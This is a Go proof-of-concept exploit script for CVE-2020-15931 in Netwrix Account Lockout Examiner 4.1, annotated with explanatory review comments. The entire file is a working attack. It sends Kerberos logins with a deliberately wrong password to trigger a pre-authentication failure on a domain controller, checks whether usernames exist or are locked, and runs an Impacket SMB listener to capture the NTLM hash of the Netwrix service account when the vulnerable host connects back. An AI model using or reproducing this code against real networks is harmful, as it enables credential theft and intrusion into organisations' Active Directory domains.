// Version : 1.0
// Created date : 08/13/2020
// Last update : 08/13/2020
// Authors : Daniel Min (@bigb0ss) & Robert Surace (@robSauce)
// Description : Proof-of-Concept Exploit Script for CVE-2020-15931
package main
import (
"flag"
"fmt"
"os"
"strings"
"log"
"os/exec"
"github.com/fatih/color"
kclient "github.com/ropnop/gokrb5/client"
kconfig "github.com/ropnop/gokrb5/config"
)
// Authenticator abstracts a login step that yields two strings and an error.
// Nothing in this file implements or calls it (kerbAuth returns a plain
// string), so it is presumably a leftover from an earlier design.
type Authenticator interface {
	Login() (string, string, error)
}
// Command-line help text and the krb5.conf template consumed by kerbAuth.
const (
	// usage is printed for -h and whenever a required flag is missing.
	usage = `
Required:
-d Domain name
-dc Domain controller
-u Valid username
Optional:
-h Print this help menu
Example:
./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith
`
	// KERB_FMT_STRING is expanded with fmt.Sprintf(KERB_FMT_STRING, realm, kdc);
	// both %s placeholders sit in the [realms] section. The
	// `default_realm = ${REALM}` line is a literal, not a substitution —
	// presumably harmless because the realm is also passed explicitly to the
	// client, but worth confirming if the config parser ever rejects it.
	KERB_FMT_STRING = `[libdefaults]
default_realm = ${REALM}
dns_lookup_realm = false
dns_lookup_kdc = true
[realms]
%s = {
kdc = %s
}`
)
// FlagOptions holds the parsed command-line flags (see options()).
type FlagOptions struct {
	help     bool   // -h: print usage and exit
	username string // -u: account whose pre-auth failure is to be triggered
	domain   string // -d: Kerberos realm / AD domain, passed through as typed
	password string // never set by options(); kerbAuth uses a fixed bogus password on purpose
	dc       string // -dc: KDC / domain controller address
}
// banner writes the tool's ASCII-art header to stdout in white via fatih/color.
// The art is a raw string, so its whitespace must not be reflowed.
func banner() {
	const art = `
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
`
	color.White(art)
}
// options registers -u, -d, -dc and -h on the default flag set, parses the
// process arguments and returns the result. The password field of the
// returned struct is intentionally left empty: the tool always authenticates
// with a bogus password (see kerbAuth).
//
// Note that this uses the global flag set, so it must only be called once per
// process; a second call panics on flag redefinition.
func options() *FlagOptions {
	var opts FlagOptions
	flag.StringVar(&opts.username, "u", "", "Username")
	flag.StringVar(&opts.domain, "d", "", "Domain Name")
	flag.StringVar(&opts.dc, "dc", "", "Domain controller")
	flag.BoolVar(&opts.help, "h", false, "Help Menu")
	flag.Parse()
	return &opts
}
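// kerbAuth runs a single Kerberos AS exchange against domainController for
// username@domain using a deliberately wrong password. Success is not the
// goal: a failed pre-authentication makes the DC log event ID 4771 for that
// user, which is the trigger the vulnerable Netwrix component reacts to.
//
// Fatal outcomes (unparsable config, DC unreachable, clock skew, unknown
// principal, locked account) print a diagnostic and call os.Exit(1). Any
// other outcome prints a summary and returns it to the caller.
//
// NOTE(review): the realm is used exactly as typed on the command line;
// Kerberos realm names are conventionally upper-case — confirm the target
// KDC accepts the lower-case form before blaming the tool for a failure.
func kerbAuth(username string, domain string, domainController string) string {
	const pass = "wrongPass" // intentionally invalid: we want pre-auth to FAIL

	payload := "[+] DC: \t" + domainController + "\n"
	payload += "[+] Domain: \t" + domain + "\n"
	payload += "[+] Username: \t" + username + "\n"
	payload += "[+] Password: \t" + pass + "\n"

	// Minimal krb5.conf that pins the realm to the supplied KDC.
	cfg, err := kconfig.NewConfigFromString(fmt.Sprintf(KERB_FMT_STRING, domain, domainController))
	if err != nil {
		// Previously this error was discarded and a nil config handed to the client.
		color.Red("[-] Invalid Kerberos config: %v\n", err)
		os.Exit(1)
	}

	cl := kclient.NewClientWithPassword(username, domain, pass, cfg, kclient.DisablePAFXFAST(true))
	err = cl.Login()
	if err == nil {
		// "wrongPass" was accepted, so no pre-auth failure (4771) was logged
		// and the callback we are waiting for will not happen.
		color.Yellow("[!] Login unexpectedly succeeded; no pre-authentication failure event was triggered.\n")
		return payload
	}

	// gokrb5 errors are matched on their text, as the original did; the
	// substrings are the KRB error names the library embeds in its messages.
	msg := err.Error()
	switch {
	case strings.Contains(msg, "Networking_Error: AS Exchange Error"):
		color.Red("[-] Can't connect to DC\n")
		os.Exit(1)
	case strings.Contains(msg, "KRB_AP_ERR_SKEW"):
		// Clock skew is not a connectivity problem; the old message said "Cannot connect".
		color.Red("[-] Clock skew between this host and the DC is too large (KRB_AP_ERR_SKEW)\n")
		os.Exit(1)
	case strings.Contains(msg, "KDC_ERR_C_PRINCIPAL_UNKNOWN"):
		color.Green(payload)
		color.Yellow("[-] User is NOT valid!\n")
		os.Exit(1)
	case strings.Contains(msg, "KDC_ERR_CLIENT_REVOKED"):
		color.Green(payload)
		color.Yellow("[-] User is locked!\n")
		os.Exit(1)
	case strings.Contains(msg, "KDC_ERR_PREAUTH_FAILED"):
		// This is the expected path: the DC has now logged event ID 4771.
		payload += "[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!\n"
		color.Green(payload)
		color.Cyan("[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.\n")
	default:
		// Unknown failure: the original printed the summary with no hint of
		// what went wrong, leaving the operator to guess.
		fmt.Println(payload)
		color.Yellow("[!] Unexpected Kerberos error: %v\n", err)
	}
	return payload
}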
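// smb launches Impacket's smbserver.py (expected on $PATH) sharing /tmp as
// "test" with SMB2 support, wires its output to this process's stdout/stderr
// and blocks until it exits. The vulnerable Netwrix host is expected to
// connect back to this share, and smbserver.py prints the NTLM exchange.
//
// Caveat: this exposes the local /tmp directory to unauthenticated SMB
// clients for as long as the listener runs. On a real engagement bind it to
// an isolated interface and share an empty, dedicated directory instead.
func smb() {
	// Resolve up front so a missing Impacket install produces a clear message
	// rather than a generic exec error.
	bin, err := exec.LookPath("smbserver.py")
	if err != nil {
		log.Printf("[-] smbserver.py not found in PATH (is Impacket installed?): %v", err)
		return
	}

	cmd := exec.Command(bin, "test", "/tmp", "-smb2support")
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	// The original logged the result of Run() unconditionally, which printed
	// "<nil>" on a clean exit; only report actual failures.
	if err := cmd.Run(); err != nil {
		log.Printf("[-] smbserver.py exited with error: %v", err)
	}
}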
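// main wires the two steps together: trigger a 4771 pre-authentication
// failure for the target user on the DC, then run an SMB listener to catch
// the callback from the vulnerable Netwrix host.
func main() {
	banner()
	opt := options()
	if opt.help {
		fmt.Println(usage)
		os.Exit(0)
	}
	if opt.username == "" || opt.domain == "" || opt.dc == "" {
		fmt.Println(usage)
		// Usage error: previously exited 0, which made a missing -u/-d/-dc
		// indistinguishable from success for any wrapper script.
		os.Exit(1)
	}

	// kerbAuth exits the process itself on every fatal Kerberos outcome.
	kerbAuth(opt.username, opt.domain, opt.dc)

	// NOTE(review): the listener is only started after the 4771 event has
	// been generated. If the vulnerable host connects back before
	// smbserver.py is accepting, the hash is missed; starting the listener
	// first would close that window but needs care around the os.Exit calls
	// in kerbAuth (they would orphan the child process).
	fmt.Println("[+] SMB Server Started...")
	smb()
}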